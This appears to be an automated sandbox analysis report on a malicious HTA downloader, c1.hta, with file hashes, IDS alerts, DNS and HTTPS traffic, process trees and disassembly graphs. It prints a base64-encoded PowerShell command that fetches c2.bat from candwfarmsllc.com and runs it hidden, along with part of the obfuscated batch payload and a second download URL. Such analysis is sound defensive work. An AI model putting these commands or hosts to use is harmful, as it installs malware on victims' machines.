                                              • HyperText Markup Language (11501/1) 38.98%
                                              • HyperText Markup Language (6006/1) 20.35%
                                              File name:c1.hta
                                              File size:3'435 bytes
                                              MD5:ecfb39d00afa505fb6af958241ff5e35
                                              SHA1:7425bc879cf05b14248e6cd60186a39423c35a7e
                                              SHA256:a70bc984039d77fc9e208f2daf97d2578032388ceee67fccf1da27d81d8ecfba
                                              SHA512:3239786926f2190da9660cbea5ed6e7eb5d1045bb14e7aa5686d35ec64576dce818db23f038b4f6281ae21f7cf68224f3954ff2373ddd33e8709b0ff64774c4c
                                              SSDEEP:48:GOhhqnDjVJ9EAJtQWFUR/CZNOiPiZvJklJNA/kjw2K4DhEHP//w/CO:GkqnDjVJ9DJpZ0aiZvqQk02K4m//S
                                              TLSH:08617322E9AEBC94473973700809699AE3C71B1357615B09FCDF241FEF78610E34AA9D
                                              File Content Preview:<html>..<head>.. <title></title>.. <HTA:APPLICATION.. ID="app".. APPLICATIONNAME="Downloader".. WINDOWSTATE="minimize".. BORDER="thin".. SCROLL="no".. SINGLEINSTANCE="yes".. SHOWINTASKBAR="no"..

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2025-01-12T03:44:00.404366+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449732193.26.115.39443TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 12, 2025 03:43:59.570810080 CET49732443192.168.2.4193.26.115.39
                                              Jan 12, 2025 03:43:59.570867062 CET44349732193.26.115.39192.168.2.4
                                              Jan 12, 2025 03:43:59.570955038 CET49732443192.168.2.4193.26.115.39
                                              Jan 12, 2025 03:43:59.580404043 CET49732443192.168.2.4193.26.115.39
                                              Jan 12, 2025 03:43:59.580425978 CET44349732193.26.115.39192.168.2.4
                                              Jan 12, 2025 03:44:00.167954922 CET44349732193.26.115.39192.168.2.4
                                              Jan 12, 2025 03:44:00.168024063 CET49732443192.168.2.4193.26.115.39
                                              Jan 12, 2025 03:44:00.175616026 CET49732443192.168.2.4193.26.115.39
                                              Jan 12, 2025 03:44:00.175668001 CET44349732193.26.115.39192.168.2.4
                                              Jan 12, 2025 03:44:00.175918102 CET44349732193.26.115.39192.168.2.4
                                              Jan 12, 2025 03:44:00.238174915 CET49732443192.168.2.4193.26.115.39
                                              Jan 12, 2025 03:44:00.246594906 CET49732443192.168.2.4193.26.115.39
                                              Jan 12, 2025 03:44:00.287379026 CET44349732193.26.115.39192.168.2.4
                                              Jan 12, 2025 03:44:00.404441118 CET44349732193.26.115.39192.168.2.4
                                              Jan 12, 2025 03:44:00.404488087 CET44349732193.26.115.39192.168.2.4
                                              Jan 12, 2025 03:44:00.404545069 CET49732443192.168.2.4193.26.115.39
                                              Jan 12, 2025 03:44:00.404580116 CET44349732193.26.115.39192.168.2.4
                                              Jan 12, 2025 03:44:00.404630899 CET44349732193.26.115.39192.168.2.4
                                              Jan 12, 2025 03:44:00.404642105 CET49732443192.168.2.4193.26.115.39
                                              Jan 12, 2025 03:44:00.404685020 CET49732443192.168.2.4193.26.115.39
                                              Jan 12, 2025 03:44:00.429357052 CET49732443192.168.2.4193.26.115.39

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 12, 2025 03:43:59.507791042 CET5820553192.168.2.41.1.1.1
                                              Jan 12, 2025 03:43:59.539448977 CET53582051.1.1.1192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jan 12, 2025 03:43:59.507791042 CET192.168.2.41.1.1.10xee70Standard query (0)candwfarmsllc.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jan 12, 2025 03:43:59.539448977 CET1.1.1.1192.168.2.40xee70No error (0)candwfarmsllc.com193.26.115.39A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • candwfarmsllc.com

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449732193.26.115.394434456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2025-01-12 02:44:00 UTC168OUTGET /c2.bat HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                              Host: candwfarmsllc.com
                                              Connection: Keep-Alive
                                              2025-01-12 02:44:00 UTC288INHTTP/1.1 200 OK
                                              Date: Sun, 12 Jan 2025 02:44:00 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                              Last-Modified: Tue, 07 Jan 2025 14:48:52 GMT
                                              ETag: "e32-62b1ed7f84eca"
                                              Accept-Ranges: bytes
                                              Content-Length: 3634
                                              Connection: close
                                              Content-Type: application/x-msdownload
                                              2025-01-12 02:44:00 UTC3634INData Raw: 40 25 56 4c 75 78 44 78 42 4d 25 65 25 7a 6b 6e 68 74 72 74 69 25 63 25 71 58 49 65 25 68 25 44 69 6f 55 70 72 62 25 6f 25 6e 46 25 20 25 58 53 7a 70 4a 75 4a 25 6f 25 5a 25 66 25 64 4c 25 66 25 65 45 4d 42 25 0d 0a 73 65 74 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6d 79 67 75 79 61 70 70 2e 63 6f 6d 2f 6d 73 77 6f 72 64 2e 7a 69 70 0d 0a 73 25 4f 66 52 5a 68 25 65 25 62 7a 68 6b 72 75 53 59 25 74 25 44 6b 75 74 4b 64 25 20 25 64 78 44 48 25 75 25 4b 7a 47 25 72 25 4b 47 75 57 67 70 42 6d 4d 6f 25 6c 25 61 64 71 50 68 42 77 52 25 3d 25 59 4e 4d 6a 6d 25 68 25 72 74 52 4c 74 50 4a 65 52 25 74 25 44 53 66 57 7a 53 25 74 25 79 59 79 25 70 25 41 42 54 4d 57 58 75 41 73 25 73 25 6d 25 3a 25 4d 49 25 2f 25 53 6e 42 6c 25 2f 25 74 74 6d 25 6d 25 67 76 74 25 79 25
                                              Data Ascii: @%VLuxDxBM%e%zknhtrti%c%qXIe%h%DioUprb%o%nF% %XSzpJuJ%o%Z%f%dL%f%eEMB%set url=https://myguyapp.com/msword.zips%OfRZh%e%bzhkruSY%t%DkutKd% %dxDH%u%KzG%r%KGuWgpBmMo%l%adqPhBwR%=%YNMjm%h%rtRLtPJeR%t%DSfWzS%t%yYy%p%ABTMWXuAs%s%m%:%MI%/%SnBl%/%ttm%m%gvt%y%


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:21:43:56
                                              Start date:11/01/2025
                                              Path:C:\Windows\SysWOW64\mshta.exe
                                              Wow64 process (32bit):true
                                              Commandline:mshta.exe "C:\Users\user\Desktop\c1.hta"
                                              Imagebase:0x2d0000
                                              File size:13'312 bytes
                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:21:43:57
                                              Start date:11/01/2025
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA
                                              Imagebase:0xb0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:21:43:57
                                              Start date:11/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:2.5%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:35%
                                                Total number of Nodes:20
                                                Total number of Limit Nodes:0
                                                execution_graph 12148 2cfa488 12150 2cfa4b7 12148->12150 12149 2cfa616 12150->12149 12152 2cfaeff 12150->12152 12153 2cfaf11 12152->12153 12154 2cfaf09 12152->12154 12153->12154 12157 2cfaf20 12153->12157 12161 2cfaf30 12153->12161 12154->12149 12160 2cfaf5a 12157->12160 12159 2cfb506 12159->12154 12165 2cfa3f4 12160->12165 12163 2cfaf5a 12161->12163 12162 2cfa3f4 CreateProcessW 12164 2cfb506 12162->12164 12163->12162 12164->12154 12166 2cfba08 CreateProcessW 12165->12166 12168 2cfbcb7 12166->12168 12169 2cfa500 12171 2cfa520 12169->12171 12170 2cfa616 12171->12170 12172 2cfaeff CreateProcessW 12171->12172 12172->12170

                                                Executed Functions

                                                Function 02CFAF30 Relevance: 4.2, Strings: 3, Instructions: 481COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 171 2cfaf30-2cfaf8b 176 2cfaf8d-2cfaf93 171->176 177 2cfaf95 171->177 178 2cfaf98-2cfaf9c 176->178 177->178 179 2cfaf9e-2cfafa4 178->179 180 2cfafa6 178->180 181 2cfafa9-2cfafb6 179->181 180->181 183 2cfafb8-2cfb002 181->183 184 2cfb004-2cfb044 call 2cfa3dc 181->184 192 2cfb04c-2cfb050 183->192 184->192 194 2cfb09e-2cfb0de call 2cfa3dc 192->194 195 2cfb052-2cfb09c 192->195 204 2cfb0e6-2cfb0ea 194->204 195->204 206 2cfb0ec-2cfb136 204->206 207 2cfb138-2cfb181 call 2cfa3dc 204->207 216 2cfb189-2cfb199 206->216 207->216 217 2cfb19b-2cfb1a0 216->217 218 2cfb1a2-2cfb1b0 216->218 220 2cfb1d7-2cfb1ec 217->220 218->220 221 2cfb1b2 218->221 228 2cfb26f-2cfb273 220->228 229 2cfb1f2-2cfb208 220->229 222 2cfb1b9-2cfb1bf 221->222 223 2cfb1c9-2cfb1cf 221->223 224 2cfb1d1 221->224 225 2cfb1c1-2cfb1c7 221->225 222->220 223->220 224->220 225->220 230 2cfb279-2cfb282 228->230 231 2cfb4a2-2cfb4d6 228->231 229->228 232 2cfb20a-2cfb218 229->232 233 2cfb28b-2cfb294 230->233 234 2cfb284 230->234 255 2cfb4d8-2cfb4de 231->255 256 2cfb4e0 231->256 239 2cfb21a-2cfb221 232->239 240 2cfb228-2cfb26c 232->240 235 2cfb296-2cfb2a0 233->235 236 2cfb2a2-2cfb2ad 233->236 234->233 244 2cfb2af-2cfb2b6 235->244 236->244 239->240 240->228 246 2cfb2b8-2cfb2be 244->246 247 2cfb2c0 244->247 249 2cfb2c3-2cfb2c7 246->249 247->249 251 2cfb2c9-2cfb2d5 249->251 252 2cfb2d7-2cfb2da 249->252 254 2cfb2e0-2cfb2e4 251->254 252->254 259 2cfb2ee 254->259 260 2cfb2e6-2cfb2ec 254->260 258 2cfb4e3-2cfb508 call 2cfa3f4 255->258 256->258 267 2cfb50e-2cfb532 258->267 268 2cfb5a6-2cfb5f2 call 2cfa400 258->268 263 2cfb2f1-2cfb312 call 2cfa3e8 259->263 260->263 269 2cfb318-2cfb32a 263->269 270 2cfb474-2cfb495 263->270 343 2cfb535 call 2cfbdc8 267->343 344 2cfb535 call 2cfbdd8 267->344 295 2cfb5f9-2cfb5fe 268->295 277 2cfb32c-2cfb33e 269->277 278 2cfb343-2cfb349 269->278 284 2cfb49f-2cfb4a0 270->284 285 2cfb497 270->285 297 2cfb41c-2cfb421 277->297 282 2cfb3bd-2cfb41a 278->282 283 2cfb34b-2cfb3bb 278->283 282->297 283->297 284->231 285->284 298 2cfb608-2cfb660 295->298 299 2cfb600 295->299 300 2cfb46d 297->300 301 2cfb423-2cfb46b 297->301 324 2cfb5e7-2cfb5eb 298->324 325 2cfb662-2cfb66a 298->325 299->298 300->270 301->300 302 2cfb53b-2cfb59f 302->268 328 2cfb66b-2cfb723 324->328 330 2cfb5ed 324->330 325->328 330->295 343->302 344->302
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1692280304.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2cf0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4L^q$4L^q$4L^q
                                                • API String ID: 0-1735365799
                                                • Opcode ID: bdc286400163e51e86a6dc8c7e67374c1745eb4ee111275f252d81dd99508d3b
                                                • Instruction ID: 211bfa435f124102b5172eb6341ba8c2d84d0e25ca1b4fa5ff60321da58906e3
                                                • Opcode Fuzzy Hash: bdc286400163e51e86a6dc8c7e67374c1745eb4ee111275f252d81dd99508d3b
                                                • Instruction Fuzzy Hash: C3126D70A002088FDB58DFA5C494BADBBF2FF88308F148568D50A9B395DB75AD45CF91
                                                Function 02CFA3F4 Relevance: 1.8, APIs: 1, Instructions: 284processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 757 2cfa3f4-2cfba88 760 2cfba8a-2cfba90 757->760 761 2cfba93-2cfba9c 757->761 760->761 762 2cfba9e-2cfbacb 761->762 763 2cfbb09-2cfbb0d 761->763 772 2cfbacd-2cfbacf 762->772 773 2cfbafb 762->773 764 2cfbb0f-2cfbb32 763->764 765 2cfbb38-2cfbb48 763->765 764->765 767 2cfbb4a-2cfbb66 765->767 768 2cfbb67-2cfbb6b 765->768 767->768 769 2cfbb6d-2cfbb84 768->769 770 2cfbb8c-2cfbb9a 768->770 769->770 776 2cfbb9c-2cfbbb8 770->776 777 2cfbbb9-2cfbbbd 770->777 774 2cfbaf1-2cfbaf9 772->774 775 2cfbad1-2cfbadb 772->775 780 2cfbb00-2cfbb03 773->780 774->780 778 2cfbadf-2cfbaed 775->778 779 2cfbadd 775->779 776->777 781 2cfbbbf-2cfbbd5 777->781 782 2cfbbdd-2cfbbf6 777->782 778->778 784 2cfbaef 778->784 779->778 780->763 781->782 785 2cfbbf8-2cfbc01 782->785 786 2cfbc04-2cfbc0d 782->786 784->774 785->786 787 2cfbc0f-2cfbc26 786->787 788 2cfbc28-2cfbc2c 786->788 787->788 789 2cfbc2e-2cfbc3f 788->789 790 2cfbc47-2cfbc5b 788->790 789->790 791 2cfbc5d 790->791 792 2cfbc60-2cfbcb5 CreateProcessW 790->792 791->792 793 2cfbcbe-2cfbcdb 792->793 794 2cfbcb7-2cfbcbd 792->794 797 2cfbcdd-2cfbce9 793->797 798 2cfbcf1-2cfbd1b 793->798 794->793 797->798 801 2cfbd1d-2cfbd21 798->801 802 2cfbd2b-2cfbd2f 798->802 801->802 805 2cfbd23-2cfbd26 call 2cf05c4 801->805 803 2cfbd44-2cfbd48 802->803 804 2cfbd31-2cfbd35 802->804 808 2cfbd5d-2cfbd61 803->808 809 2cfbd4a-2cfbd4e 803->809 804->803 807 2cfbd37-2cfbd3a 804->807 805->802 807->803 811 2cfbd76-2cfbd7a 808->811 812 2cfbd63-2cfbd67 808->812 809->808 810 2cfbd50-2cfbd53 809->810 810->808 814 2cfbd7c-2cfbd88 811->814 815 2cfbd8b 811->815 812->811 813 2cfbd69-2cfbd6c 812->813 813->811 814->815 817 2cfbd8c 815->817 817->817
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000004), ref: 02CFBCA5
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1692280304.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2cf0000_powershell.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: b619de679ad1317ecc5f382891aec201f2788f6e7c2686911e1775b53aa20290
                                                • Instruction ID: b3e19a2af32ac5849befa444ff80ed91dc227843cf374b2cb0eb49be91863e6d
                                                • Opcode Fuzzy Hash: b619de679ad1317ecc5f382891aec201f2788f6e7c2686911e1775b53aa20290
                                                • Instruction Fuzzy Hash: BCC13971D00619DFDB64CFA9C884BDEBBF1BF88308F258129E505A7254DB70A985CF91
                                                Function 02CFB9FE Relevance: 1.8, APIs: 1, Instructions: 284COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 818 2cfb9fe-2cfba88 821 2cfba8a-2cfba90 818->821 822 2cfba93-2cfba9c 818->822 821->822 823 2cfba9e-2cfbacb 822->823 824 2cfbb09-2cfbb0d 822->824 833 2cfbacd-2cfbacf 823->833 834 2cfbafb 823->834 825 2cfbb0f-2cfbb32 824->825 826 2cfbb38-2cfbb48 824->826 825->826 828 2cfbb4a-2cfbb66 826->828 829 2cfbb67-2cfbb6b 826->829 828->829 830 2cfbb6d-2cfbb84 829->830 831 2cfbb8c-2cfbb9a 829->831 830->831 837 2cfbb9c-2cfbbb8 831->837 838 2cfbbb9-2cfbbbd 831->838 835 2cfbaf1-2cfbaf9 833->835 836 2cfbad1-2cfbadb 833->836 841 2cfbb00-2cfbb03 834->841 835->841 839 2cfbadf-2cfbaed 836->839 840 2cfbadd 836->840 837->838 842 2cfbbbf-2cfbbd5 838->842 843 2cfbbdd-2cfbbf6 838->843 839->839 845 2cfbaef 839->845 840->839 841->824 842->843 846 2cfbbf8-2cfbc01 843->846 847 2cfbc04-2cfbc0d 843->847 845->835 846->847 848 2cfbc0f-2cfbc26 847->848 849 2cfbc28-2cfbc2c 847->849 848->849 850 2cfbc2e-2cfbc3f 849->850 851 2cfbc47-2cfbc5b 849->851 850->851 852 2cfbc5d 851->852 853 2cfbc60-2cfbcb5 CreateProcessW 851->853 852->853 854 2cfbcbe-2cfbcdb 853->854 855 2cfbcb7-2cfbcbd 853->855 858 2cfbcdd-2cfbce9 854->858 859 2cfbcf1-2cfbd1b 854->859 855->854 858->859 862 2cfbd1d-2cfbd21 859->862 863 2cfbd2b-2cfbd2f 859->863 862->863 866 2cfbd23-2cfbd26 call 2cf05c4 862->866 864 2cfbd44-2cfbd48 863->864 865 2cfbd31-2cfbd35 863->865 869 2cfbd5d-2cfbd61 864->869 870 2cfbd4a-2cfbd4e 864->870 865->864 868 2cfbd37-2cfbd3a 865->868 866->863 868->864 872 2cfbd76-2cfbd7a 869->872 873 2cfbd63-2cfbd67 869->873 870->869 871 2cfbd50-2cfbd53 870->871 871->869 875 2cfbd7c-2cfbd88 872->875 876 2cfbd8b 872->876 873->872 874 2cfbd69-2cfbd6c 873->874 874->872 875->876 878 2cfbd8c 876->878 878->878
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1692280304.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2cf0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 097ab90ead509dc2d71c5ade8644ade8d060241eb8ec7c3c61c82950f38f85f7
                                                • Instruction ID: b42dbe797376ddf830a4eb335c6cf93593af58d9be082837044c9f3e13b84380
                                                • Opcode Fuzzy Hash: 097ab90ead509dc2d71c5ade8644ade8d060241eb8ec7c3c61c82950f38f85f7
                                                • Instruction Fuzzy Hash: 40C13971D00619DFDB64CFA9C884BDEBBF1BF88308F258129E905A7254DB70A985CF91
                                                Function 074D1A18 Relevance: 5.6, Strings: 4, Instructions: 589COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 74d1a18-74d1a3d 1 74d1c30-74d1c7a 0->1 2 74d1a43-74d1a48 0->2 12 74d1dfe-74d1e42 1->12 13 74d1c80-74d1c85 1->13 3 74d1a4a-74d1a50 2->3 4 74d1a60-74d1a64 2->4 8 74d1a54-74d1a5e 3->8 9 74d1a52 3->9 5 74d1a6a-74d1a6c 4->5 6 74d1be0-74d1bea 4->6 10 74d1a7c 5->10 11 74d1a6e-74d1a7a 5->11 14 74d1bec-74d1bf5 6->14 15 74d1bf8-74d1bfe 6->15 8->4 9->4 16 74d1a7e-74d1a80 10->16 11->16 29 74d1f58-74d1f8d 12->29 30 74d1e48-74d1e4d 12->30 17 74d1c9d-74d1ca1 13->17 18 74d1c87-74d1c8d 13->18 19 74d1c04-74d1c10 15->19 20 74d1c00-74d1c02 15->20 16->6 26 74d1a86-74d1aa5 16->26 24 74d1ca7-74d1ca9 17->24 25 74d1db0-74d1dba 17->25 27 74d1c8f 18->27 28 74d1c91-74d1c9b 18->28 23 74d1c12-74d1c2d 19->23 20->23 32 74d1cb9 24->32 33 74d1cab-74d1cb7 24->33 34 74d1dbc-74d1dc4 25->34 35 74d1dc7-74d1dcd 25->35 65 74d1ab5 26->65 66 74d1aa7-74d1ab3 26->66 27->17 28->17 53 74d1f8f-74d1fb1 29->53 54 74d1fbb-74d1fc5 29->54 42 74d1e4f-74d1e55 30->42 43 74d1e65-74d1e69 30->43 37 74d1cbb-74d1cbd 32->37 33->37 38 74d1dcf-74d1dd1 35->38 39 74d1dd3-74d1ddf 35->39 37->25 47 74d1cc3-74d1ce2 37->47 48 74d1de1-74d1dfb 38->48 39->48 49 74d1e59-74d1e63 42->49 50 74d1e57 42->50 44 74d1e6f-74d1e71 43->44 45 74d1f0a-74d1f14 43->45 51 74d1e81 44->51 52 74d1e73-74d1e7f 44->52 55 74d1f16-74d1f1e 45->55 56 74d1f21-74d1f27 45->56 89 74d1ce4-74d1cf0 47->89 90 74d1cf2 47->90 49->43 50->43 60 74d1e83-74d1e85 51->60 52->60 97 74d2005-74d202e 53->97 98 74d1fb3-74d1fb8 53->98 68 74d1fcf-74d1fd5 54->68 69 74d1fc7-74d1fcc 54->69 63 74d1f2d-74d1f39 56->63 64 74d1f29-74d1f2b 56->64 60->45 70 74d1e8b-74d1e8d 60->70 72 74d1f3b-74d1f55 63->72 64->72 73 74d1ab7-74d1ab9 65->73 66->73 74 74d1fdb-74d1fe7 68->74 75 74d1fd7-74d1fd9 68->75 76 74d1e8f-74d1e95 70->76 77 74d1ea7-74d1eae 70->77 73->6 80 74d1abf-74d1ac6 73->80 82 74d1fe9-74d2002 74->82 75->82 84 74d1e99-74d1ea5 76->84 85 74d1e97 76->85 86 74d1ec6-74d1f07 77->86 87 74d1eb0-74d1eb6 77->87 80->1 91 74d1acc-74d1ad1 80->91 84->77 85->77 94 74d1eb8 87->94 95 74d1eba-74d1ec4 87->95 99 74d1cf4-74d1cf6 89->99 90->99 100 74d1ae9-74d1af8 91->100 101 74d1ad3-74d1ad9 91->101 94->86 95->86 117 74d205d-74d2078 97->117 118 74d2030-74d2041 97->118 99->25 105 74d1cfc-74d1d33 99->105 100->6 113 74d1afe-74d1b1c 100->113 102 74d1add-74d1ae7 101->102 103 74d1adb 101->103 102->100 103->100 123 74d1d4d-74d1d54 105->123 124 74d1d35-74d1d3b 105->124 113->6 127 74d1b22-74d1b47 113->127 125 74d207a-74d208c 117->125 126 74d2042-74d2056 117->126 118->126 132 74d1d6c-74d1dad 123->132 133 74d1d56-74d1d5c 123->133 128 74d1d3d 124->128 129 74d1d3f-74d1d4b 124->129 130 74d208e-74d20ab 125->130 131 74d20c5-74d20cf 125->131 126->117 127->6 150 74d1b4d-74d1b54 127->150 128->123 129->123 147 74d20ad-74d20bf 130->147 148 74d2115-74d211a 130->148 138 74d20d8-74d20de 131->138 139 74d20d1-74d20d5 131->139 136 74d1d5e 133->136 137 74d1d60-74d1d6a 133->137 136->132 137->132 143 74d20e4-74d20f0 138->143 144 74d20e0-74d20e2 138->144 145 74d20f2-74d2112 143->145 144->145 147->131 148->147 152 74d1b9a-74d1bcd 150->152 153 74d1b56-74d1b71 150->153 167 74d1bd4-74d1bdd 152->167 159 74d1b8b-74d1b8f 153->159 160 74d1b73-74d1b79 153->160 164 74d1b96-74d1b98 159->164 162 74d1b7d-74d1b89 160->162 163 74d1b7b 160->163 162->159 163->159 164->167
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1698864330.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$4'^q$4'^q
                                                • API String ID: 0-1420252700
                                                • Opcode ID: 3d435c0297da24afe164a06c187cdac3d9b1ff7fdb9177c000b78409fbb7c1e8
                                                • Instruction ID: 146382fd18b08efcd232c457fe7f85d61da780616f3879b7010beeceb3dd6d95
                                                • Opcode Fuzzy Hash: 3d435c0297da24afe164a06c187cdac3d9b1ff7fdb9177c000b78409fbb7c1e8
                                                • Instruction Fuzzy Hash: AE1255F170425A8FCB158B6898207EBBBA2AFC2610F15847BD985CF351DB31CD86C7A1
                                                Function 074D19F9 Relevance: .1, Instructions: 125COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1008 74d19f9-74d1a3d 1011 74d1c30-74d1c7a 1008->1011 1012 74d1a43-74d1a48 1008->1012 1022 74d1dfe-74d1e42 1011->1022 1023 74d1c80-74d1c85 1011->1023 1013 74d1a4a-74d1a50 1012->1013 1014 74d1a60-74d1a64 1012->1014 1018 74d1a54-74d1a5e 1013->1018 1019 74d1a52 1013->1019 1015 74d1a6a-74d1a6c 1014->1015 1016 74d1be0-74d1bea 1014->1016 1020 74d1a7c 1015->1020 1021 74d1a6e-74d1a7a 1015->1021 1024 74d1bec-74d1bf5 1016->1024 1025 74d1bf8-74d1bfe 1016->1025 1018->1014 1019->1014 1026 74d1a7e-74d1a80 1020->1026 1021->1026 1039 74d1f58-74d1f8d 1022->1039 1040 74d1e48-74d1e4d 1022->1040 1027 74d1c9d-74d1ca1 1023->1027 1028 74d1c87-74d1c8d 1023->1028 1029 74d1c04-74d1c10 1025->1029 1030 74d1c00-74d1c02 1025->1030 1026->1016 1036 74d1a86-74d1aa5 1026->1036 1034 74d1ca7-74d1ca9 1027->1034 1035 74d1db0-74d1dba 1027->1035 1037 74d1c8f 1028->1037 1038 74d1c91-74d1c9b 1028->1038 1033 74d1c12-74d1c2d 1029->1033 1030->1033 1042 74d1cb9 1034->1042 1043 74d1cab-74d1cb7 1034->1043 1044 74d1dbc-74d1dc4 1035->1044 1045 74d1dc7-74d1dcd 1035->1045 1075 74d1ab5 1036->1075 1076 74d1aa7-74d1ab3 1036->1076 1037->1027 1038->1027 1063 74d1f8f-74d1fb1 1039->1063 1064 74d1fbb-74d1fc5 1039->1064 1052 74d1e4f-74d1e55 1040->1052 1053 74d1e65-74d1e69 1040->1053 1047 74d1cbb-74d1cbd 1042->1047 1043->1047 1048 74d1dcf-74d1dd1 1045->1048 1049 74d1dd3-74d1ddf 1045->1049 1047->1035 1057 74d1cc3-74d1ce2 